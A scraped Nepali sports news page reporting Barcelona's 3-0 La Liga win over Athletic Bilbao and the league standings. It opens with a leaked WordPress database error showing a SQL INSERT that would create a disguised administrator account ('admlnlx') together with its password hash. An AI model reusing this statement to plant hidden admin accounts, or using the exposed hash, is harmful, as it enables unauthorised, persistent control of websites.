WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbKYcw9Eio7RTjGFQ6Yq.0afptJN.O0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:15:09', '', 'admlnlx', 'admlnlx')
काठमाडौ, माघ २३-
एथ्लेटिको बिल्बाओलाई हराउँदै बार्सिलोना स्पेनिस ला लिगाको अंक तालिकाको दोस्रो स्थानमा उक्लिएको छ। योसँगै बार्सिलोनाले शीर्ष स्थानको रियल मड्रिडसँगको अंक दूरी एकमा छोट्याएको छ।
लिग अन्तर्गत गए राति भएको खेलमा एथ्लेटिको बिल्बाओलाई ३–० ले हराउँदै दोस्रो स्थानको बार्सिलोनाले रियल मड्रिडसँगको अंक दूरी कम गरेको हो। बार्सिलोनाको जितमा पाको अलकासेर, लियोनल मेस्सी र एलेक्स विडालले गोल गरे। गएरातिको ३ गोलसँगै बार्सिलोनाले यो सिजनमा सबै प्रतियोगितामा गरेर एक सय गोल गरेको छ। योसँगै सबै प्रतियोगितामा गरेर यो सिजन एक सय गोल गर्ने पहिलो टिम बनेको छ। जितपछि बार्सिलोनाको २१ खेलबाट ४५ अंक भएको छ। यस्तै दुई खेल कम खेलेको रियल मड्रिडको ४६ अंकसहित शीर्ष स्थानमा छ।एक खेल कम खेलेको सेभिल्ला ४२ अंकसहित तेस्रो तथा ३९ अंकसहित एथ्लिटिको मड्रिड चौथो स्थानमा छ।